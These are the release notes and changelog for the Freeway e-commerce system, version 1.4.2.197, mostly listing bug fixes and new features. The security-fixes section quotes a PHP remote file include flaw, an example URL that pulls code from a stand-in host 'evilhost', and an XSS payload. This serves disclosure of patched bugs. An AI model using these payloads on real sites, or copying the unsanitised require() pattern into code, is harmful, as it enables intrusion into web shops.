Freeway

File Release Notes and Changelog

Release Name: 1.4.2.197 Sathish

Notes:
This is a stable release of Freeway. It is ready for production use.
 
-------------------------------------------------------------
Please Note:

For updates between releases please use our public subversion repository at:

https://www.openfreeway.org/svn/trunk/freeway/
username: public
password: public

See:

http://www.openfreeway.org/download/subversion-repository.html

for details of how to use Subversion.

Warning:

Use caution when making file and database changes using the .sql files. Only make those changes from the .sql files that are required to update your shop. 

We will be adding an automated application update tool with a web based interface to subversion built in. Until then our process will be relatively manual. 

Read the change Log for details of new features and changes.

Changes:
Significant Enhancements
 
Added One Page checkout

Added Subscription type for store memberships

Improved Products Imports and Exports

Improved Freeway news

Added Manual price adjustments in POS

Browse events, events POS and customer bookings review optimitised
 
Security Fixes
 
Freeway eCommerce system has multiple security vulnerabilities:

1. Multiple Remote/Local File Include

Example:

...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

if($command!="")
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...

[server]/[installdir]/admin/create_order_new.php=http://evilhost/info.php

Local File Include vulnerability found in script  includes/events_application_top.php

2. Linked XSS vulnerability

Example

[server]/[installdir]/admin/search_links.php"<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>
 
Bugs 

Issue - 87          Events Issues

1.Viewing Current Purchases in My Account optimised now.

2.Sum of the individual purchases is now same as the listed total.

Issue - 92         

1.Some mess in the admin order creation process cleared when viewing the summary of a credit card payment.

2.Credit card payment Type updated in secure pay.

Bug 542

Shipping Date problem in order edition problem solved.

Forum Issue 1507

Hiding the service element in create order when service disabled in shop settings fixed

Forum issue

‘Hide Event' process now corrected.

Defect 168

Delivery Address storage in checkout - fixed

Defect 169

Old Events displayed in backend create order now fixed

Defect 170

Minor Adjustment in content files regarding  error shown in top of content.

Issue 170

1. Showing error while shipping is not selected in Checkout pages.

2. Alignment of Payment error messages in Checkout.

3. News Desk info - Removed the unwanted function & style

4. Changed the page heading style in FAQ, Reviews.

ENHANCEMNT 272       New Events display

1. Events Browse display modified with sessions grouping in customer view.

2. Events Browse aligned in Standard View.

3. Minor Alignment in shopping cart in admin.

4. Customer orders page aligned as per products, Events, subscriptions & Services.

 Issue 87            Event Issues fixed for yogababy

1. Sales report total now displayed correctly.

2. For purchase in the Admin Tool, queries optimised. 

3. Yogababy template updated for one page checkout. 

Issue 92            Yogababy Issues 

1. Editing Pending Payments  should be able to be made by any payment type in the backend.

2. Added a comment to show that a price adjustment has been made.

General Bugs

1.For forgot password, the correct mail-id and password not sent.

2.My account changes in BE like password not send to user now fixed. 

Issue 92            Yogababy issues updated.

1. Shipping now added in create order.

2. Edit order now working fine.

Joomla Minor Issues

1.PHP4 joomla integration issue in front-end fixed now

2.Paypal redirect problem solved in joomla_integration
 

Issue - 92

1. Pending Payments paid by credit card now restricted.

2. Order total sort by is now fixed.

3. Manual Price Adjustment is displayed before total  

Issue 91 Customers page disappears

Click on left menu Customer link leads to customers main page.

Customer main page also displayed by choosing on Manage Customers at the top.

Create customer link is added in manage customers.
 
Issue 89 Services Loading price issue. 

1. Services Loading Price is limit changed to 7 digits now.

2. Loading type percentage limit to 3 digits.
 

Issue 87 Events Issues

1.If there are more than one session of type "Single Session" the Event Date field in the front end and Admin tool order creation should display the dates available into the future is updated.

2.If the customer does not choose to accept the terms and conditions, the Alert is displayed now.

Store Membership

While event is added to the shopping cart the stored membership tax price also added.
 

Bug 507 Attributes can't use numbers

When enter the numbers for attributes value, it didn’t save. Fixed Now.

Bug 527

State/Province settings .The states didn’t load correctly for corresponding countries selection.

Bug 529

Uncommented print_r . a uncommented print_r copied in to SVN . 

Bug 528 & Bug 530 : joomla integration cart always empty & cannot login...

"cannot destroy uninitialized session". These session problem occurred due to register_globals problem. 

Bug 532 Overbooking Shopping Cart Duplicating QTY of Services

After a service purchased, if you go back and purchase it, quantity of services increased by +1. 

Bug533 Services Available - Not Working - Over Booking

Comment sent to that customer from Bugzilla. 

Bug 536 Inventory stock is not updated

The Stock level is not updated correctly in ‘Admin >Reports > Products > Inventory Report’ 

The Following two bugs will be fixed and released with Template Implementation Release. 

Bug 511 Multi language work partially. 

Bug 534 Javascript printing outside <HTML> tags - Breaks templates. 

Issue 73 Currency symbols not displayed correctly 

1.Currency symbols( Euro / YEN ) displayed correctly in Pdf now.

2.All reports are validating with date function to display all dates including 31st. 

ENHANCEMNT 26 Freeway news improvements 

Backend changes:

1.) Standardised image management

2.) HTMLarea working now

3.) Rebuild to suit existing backend template.

4.) New page design updated for Newsdesk in Front end. 

Defect 165 Product Export / Import

1.During Export / Import Html Editor description now updated.

2.Image path updated.

3.Status De-active on import problem fixed.

4.Price & other attributes now update correctly.

Sessions_no_globals problem fixed in front end and admin.

Login problem fixed. 

Defect - 165 Products Export/ Import

1.During Export / Import Html Editor fails to work now fixed.

2.Repositioning of Products order now working.

3.Add Categories then export and reimport also working. 

Enhancement 273  Freeway images update

1.New Sharper Images updated by overwriting old ones. 

Enhancement  272 New Events display

1.New Config setting Events > Advanced > Browse Events Style. 

2.Two styles updated - Standard & Customer.

3. Create order by Add button not working, which is fixed now.

ISSUES

All reports - for every month view 30 days is kept as fixed ( used $days= date('t',strtotime($date));

            so number of days in a month get counted)

Single quote (') of customer last name. O'loughlin Jules .Now it is fixed. Ex: Jules O'loughlin ( used add slashes) 

Free events checkout in BE( event price 0.00). order value is equal to coupon price error. So checkout with price 0.00 and leads to checkout process page.            

General Errors

1. Creating new Instructor had state loading problem - Fixed Now.

2. By default Gender is chosen as male / female in creating Instructor. 

Freeway Version Alerts

1. Need to validate the current version in version.txt with freeway.xml was missing.

2. "Do not display this message again" tick box is not to be displayed when ticked.